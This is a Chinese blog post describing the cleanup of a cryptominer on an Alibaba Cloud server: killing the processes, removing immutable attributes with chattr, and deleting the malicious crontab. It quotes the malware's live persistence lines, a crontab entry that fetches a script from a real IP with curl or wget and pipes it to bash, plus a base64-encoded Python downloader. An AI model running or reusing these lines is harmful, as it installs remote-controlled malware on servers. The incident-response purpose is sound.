阿里云服务器挖矿程序解决流程

最新推荐文章于 2024-06-24 16:24:24 发布
最新推荐文章于 2024-06-24 16:24:24 发布
阅读量8.9k 收藏 18
点赞数 3
文章标签: 后端 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/adscici/article/details/107382572
版权

阿里云服务器挖矿程序解决流程

问题表象

1.CPU满负载
进入root用户执行top命令:

在这里插入图片描述
2. 应用进程被杀
./startWebLogic.sh: line 184: 23884 Killed ${JAVA_HOME}/bin/java ${JAVA_VM} M E M A R G S − D w e b l o g i c . N a m e = {MEM_ARGS} -Dweblogic.Name= MEMARGSDweblogic.Name={SERVER_NAME} -Djava.security.policy=${WLS_POLICY_FILE} ${JAVA_OPTIONS} ${PROXY_SETTINGS} ${SERVER_CLASS}

在这里插入图片描述

定位解决问题

暂时解决问题
ps –aux | grep dbuse
发现存在一堆挖矿进程:
dbusexxx
wget xxxx
python xxxx

先手工杀进程,把cpu负荷降下来:
ps -aux | egrep “dbuse|sendmail|wget|python” | awk ‘{print $2}’ | xargs kill

执行完,在top监控发现,挖矿进程不断在自启。。。没办法,只能死循环杀进程了:
while true ; do ps -aux | egrep “dbuse|sendmail|wget|python” | awk ‘{print $2}’ | xargs kill ; done
来吧,看谁更NB。
终于,进程干净了,cpu负荷也降下来了。

开始定位问题
1、 查看环境变量.bash_profile时发现存在如下异常:
cp -f -r – /bin/bprofr /bin/dbused 2>/dev/null && /bin/dbused -c >/dev/null 2>&1 && rm -rf – /bin/dbused 2>/dev/null

2、发现挖矿程序/bin/bprofr

先删了再说,rm –rf /bin/bprofr,执行时报如下错误:
rm –rf /bin/bprofr : Operation not permitted

脑瓜子嗡嗡的,什么情况,root用户也不能rm了!?离职泄愤rm –rf行不行了吗。。

一翻百度之后,执行lsattr命令显示文件属性看看,lsattr /bin/bprofr显示如下:
-----ia-----e— /bin/bprofr

Lsattr属性解析如下:
仅附加(a),不更新atime(A),压缩(c),不受写时拷贝影响(C),没有转储(d),同步目录更新(D),扩展格式(e),不可变(i),数据日志(j),安全删除(s),同步更新(S),不支持尾部合并(t),目录层次结构(T)和不可删除(u)。
以下属性是只读的,可以由lsattr(1)列出,但不能通过chattr修改:压缩错误(E),大文件(h),索引目录(l),内联数据(N),压缩原始访问(X),压缩脏文件(Z)。

再依次修改
chattr –I /bin/bprofr
chattr –a /bin/bprofr
lsattr /bin/bprofr
结果显示如下:
------------e— /bin/bprofr
最后再删除rm –rf /bin/bprofr。这下终于成功了!

源头删除后,马上修改.bash_profile,并生效,看看问题解决没有。
你以为到这里就完了?太天真了!

停掉循环杀进程后,发现dbusexx又开始挖矿了!而且刚刚删除的挖矿进程又回来了,环境变量又修改回来了。一下回到起点。

看来循环不能停哎。来,我们再来比比看。

比之前再仔细看了一遍进程列表,里面的wget -q -O - http://205.185.113.151/xmi哪来的呢?百思不得其解之际,在/bin目录下发现线索。

bin目录下4个最新程序,initdr sysdr bprofr crondr,简称4大金刚,最后一个让我眼前一亮,好像crontab还没检查,这一检查(crontab -l)果然有发现:
[root@iZ2ze1by1hkdcimza0guwmZ ~]# crontab -l
* * * * * (curl -s http://205.185.113.151/xmi||wget -q -O - http://205.185.113.151/xmi)|bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExMy4xNTEvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -
[root@iZ2ze1by1hkdcimza0guwmZ ~]#

mmp,crontab –e删除时又报错了:
[root@iZ****kZ cron]# crontab -e
crontab: installing new crontab
crontab: error renaming /var/spool/cron/#tmp.xx.XXXX3tTwiC to /var/spool/cron/root
rename: Operation not permitted
crontab: edits left in /tmp/crontab.BRY7dw

查看/var/spool/cron/root文件属性,果然
-----ia-----e— /var/spool/cron/root
chattr –i /var/spool/cron/root
chattr –a /var/spool/cron/root
rm –rf /var/spool/cron/root

清理定时任务后,再删除4大金刚及环境变量。

至此,问题终于解决!

挖矿现象是解决了,但是挖矿程序是怎么入侵云服务器,还是root用户的呢?

adscici
关注
挖矿程序的处理方式及步骤
LeeKwen的专栏
04-16 3884
概述 随着币圈市场交易的活跃,币价也被日益推高。 从BTC兑美元的在线交易平台上可以看出,BTC的价格屡创新高,这与MG的2W亿脱不了干系。 “重赏之下,必有勇夫”,在互联网圈里也同样适用啊。 所以服务器被植入挖矿程序已经不是很稀奇的事情了,很多服务器因为漏洞、弱密码、禁用防火墙等等举措,而被做了提权后,置入了挖矿程序。 如果你接收到阿里云类似于挖矿程序的报警,那就不要慌。借用一句话就是:“遇事不要慌,先拍照,发个朋友圈”。 挖矿程序的处理方式 以下,简单地说一下遇到挖矿...
记一次阿里云上Redis服务器被入侵的经历
qq_25968703的博客
06-02 3756
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
阿里云提示服务器有挖矿程序 该如何处理
网站安全专家
12-25 6235
临近2018年底,我们阿里云上的一台ECS服务器竟然被阿里云短信提示有挖矿程序,多次收到阿里云的短信提醒说什么服务器被植入挖矿程序,造成系统资源大量消耗;而且还收到CPU使用率达到百分之90的安全提醒,我们的服务器上并没有运行大量的网站,只是一个公司的展示网站,怎么可能会出现CPU%90以上的告警,然后致电阿里云技术帮忙检查服务器为什么CPU占用这么高,得知服务器被黑,导致中了挖矿木马,服务器含有...
服务器被植入挖矿程序 该怎么查杀挖矿病毒
网站安全专家
06-06 9035
阿里云ECS服务器是目前很多网站客户在使用的,可以使用不同系统在服务器中,windows2008 windows2012,linux系统都可以在阿里云服务器中使用,前段时间我们SINE安全收到客户的安全求助,说是收到阿里云的短信提醒,提醒服务器存在挖矿进程,请立即处理的安全告警。客户网站都无法正常的打开,卡的连服务器SSH远程连接都进不去,给客户造成了很大的影响。 随即我们SINE安全工程师...
处理阿里云服务器中的恶意挖矿程序
最新发布
weixin_43268590的博客
06-24 746
恶意挖矿程序会在未经用户许可的情况下在用户的设备上运行,占用大量计算资源进行挖矿,这可能会导致设备性能下降、温度升高、甚至硬件损伤。因此,用户应当做到以下措施来尽可能地预防挖矿: 及时更新系统和应用程序的安全补丁; 安装安全软件; 加强用户权限管理; 提升防火墙的安全级别,关闭不需要的服务端口; 监控服务器日志等。
阿里云服务器挖矿
weixin_44034675的博客
05-31 1203
新增SSH端口——>重启sshd服务——>添加防火墙规则——>尝试新端口登陆——>关闭原先的22端口——>增加ip白名单。dr-xr-x---. 8 root root 4096 3月 19 15:57 ..drwx------ 2 root root 4096 3月 18 14:47 .drwx------. 2 root root 4096 8月 9 2019 .- 删除i属性使文件 /etc/passwd和 /etc/shadow具有相同的属性。控制台会自动断开之前使用端口22产生的连接。
阿里云挖矿./trace -r 2 -R 2 --keepalive --no-color --donate-level 1 --max-cpu-usage 10
fuleigang的专栏
03-16 1169
根据相关法规、政策的规定及监管部门的要求,阿里云禁止客户利用阿里云服务直接或间接地从事与虚拟货币相关的业务及行为,包括但不限于虚拟货币的勘探(挖矿)、登记、交易、清算、结算等,如用户违反上述规定,阿里云有权立即停止提供所有服务。删除这个目录,发现过一会又出现,根据目录看应该是jekins程序导致的,进入jekins配置,发现异常流水线一直在构建,怪不得杀进程删文件都没用,一直在构建一直产生新的,将漏洞程序删除。杀完后发现还是异常,怀疑可能是定时任务,继续杀定时任务,发现没用,继续跟进PId查找原因,
云服务器有什么用途?新手如何使用云服务器
云计算分享
02-18 4497
自从几年前参与活动白嫖到了第一台云服务器开始,就再也停不下来了。搭博客、做图库、个人网盘、个人图书馆、私有代码仓,简直是不能更爽。 但其实在过去,上“云”是一件门槛很高、成本也很高的事情,随着云服务的发展,形势已经大不相同了。 比如阿里云建站服务,不仅能帮中小企业、开发者在云端快速构建网站、博客、电商、论坛等各类应用以及开发测试环境,还准备了丰富的定制功能,满足大家不同程度的需求。 个人开发的话,其实选哪个平台云产品都没太大差别,主要看配置和价格。 还会有小伙伴担心买了云服务器不知道能干什么,那..
威胁预警|首现新型RDPMiner挖矿蠕虫 受害主机易被添加恶意账户
阿里云技术
01-22 571
近日,阿里云安全发现一种新型挖矿蠕虫RDPMiner,通过爆破Windows Server 3389端口RDP服务的方式进行挖矿木马传播,致使用户CPU占用率暴涨,机器卡顿,更被创建名为DefaultAccount的账号。攻击者可畅通无阻远程登录机器威胁用户业务和数据安全。 据该蠕虫连接的某矿池公布的HashRate,预估仅该矿池即有2000+机器连接进行挖矿,阿里云安全专家判断该挖矿蠕虫扩散性...
Uni-app 小程序 App 的广告变现之路:激励视频广告
热门推荐
07-30 1万+
激励视频广告可以支持广告服务器到业务服务器的回调,用于业务系统判断是否提供奖励给观看广告的用户。配置服务器回调后,当用户成功看完广告时,广告服务器会访问配置的云函数,通知用户完成观看激励视频。手机用户观看几十秒视频广告,在广告播放完毕后可获得应用开发商提供的奖励,而应用开发商则可以从广告平台获取不菲的广告收入。时激励视频广告组件是自动拉取广告并进行更新的。只有在用户点击激励视频广告组件上的关闭广告按钮时,广告才会关闭。只有在用户点击激励视频广告组件上的关闭广告按钮时,广告才会关闭。...
阿里云服务器被通知存在“挖矿”行为,请及时整改
ywanju的博客
04-04 839
挖矿”行为是违f 的,一般如果不是自己操作的话,那就是被别人攻击了,利用漏洞在你的服务器上面安装了木马之类的东西。早晨被通知阿里云服务器存在挖矿行为,请及时整改,不然服务器被收回。
盘阿里云ECS内挖矿程序
ChiChengIT的专栏
04-20 558
1.二话不说先上图,cpu一路飙升在100% 2.进入服务器top命令查看占用cpu的异常进程 3.找到目标PID kill -9 10478 干掉这个进程,没几秒这个Macron的进程又死灰复燃 4.定位Macron目录 ls -l /roc/$PID/exe 定位到发现目标文件为/tmp/Macron,打开此文件发现都是二进制的,啥也看不懂 5.火速干掉此文件r...
阿里云服务器挖矿解决方法
qq_47464056的博客
07-25 5016
云服务器被入侵植入挖矿程序
记一次阿里云被挖矿处理记录,一个漏洞2w+
jennycisp的博客
08-14 439
本篇文章还有很多的不足之处,并没有找到病毒攻击的入口,又是如何入侵到系统的,挖矿的脚本究竟运行在哪?按照正常的被攻击排错方式,一开始并不顺利。总结一下系统被入侵的排查思路,只是给后来者提供一下解决思路(希望大家的系统都很健壮,不被攻击)。查看系统的CPU和内存占用查询占用系统资源过高的进程排查定时任务,crontab -l或者目录检查异常端口,如发现,禁用端口,堵漏使用last命令查看系统异常登录情况(一般攻击者会抹去入侵记录)使用history。
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 2408
有一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 3843
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
Ubuntu16.04.06 LTS -bash 进程占用cpu很高,中了挖矿病毒
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
06-21 5803
Ubuntu16.04.06 LTS -bash 进程占用cpu很高,别的程序开启过后就被killed,占用50%的CPU 1.netstat -antlp|grep -e -bash -e rsync 查看进程通信信息 与外国157.245.164.26地址通信 htop 2.root@ps-SYS-4028GR-TR:/# crontab -l 查看计划任务 /dev/shm/.bash/bash 删除crontab任务:crontab -r 3.ls -l /pr
-bash这样的木马,你遇到过没?
sqlora的专栏
06-15 5881
第一次遇到如此难搞的病毒木马-bash。 # cat /etc/redhat-release CentOS release 6.7 (Final) # ssh -V OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013 进程和文件清除后,总是会自动起来,然后占用50%的CPU netstat-ano|more 用到的命令: sar 1 10 top lsof -p 进程号 ,可以看关联了哪些进程及和那里通信,这里看到会去请求这个外部...
[问题已处理]-阿里云与本地机房中挖矿病毒处理,又又又中毒了
爷来辣的博客
09-21 1087
导语:被挖矿的现象是cpu异常的高。正常服务被系统杀掉。 先是发现线上业务挂了。紧接着发现本地机房也挂了。判断病毒应该是由本地机房的跳板机或者开放的端口,或dubbo框架漏洞进来的 基本判断是confluence最新的漏洞导致的 http://www.hackdig.com/09/hack-465498.htm 刚好看到防火墙有之前做的映射暴露出去 后期防火墙可以设置白名单 会用java去下脚本 官方临时升级办法 可能这台机子已经被注入,依旧不行,阿里云还是会告警。 如需要查看完整感染脚本 c
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值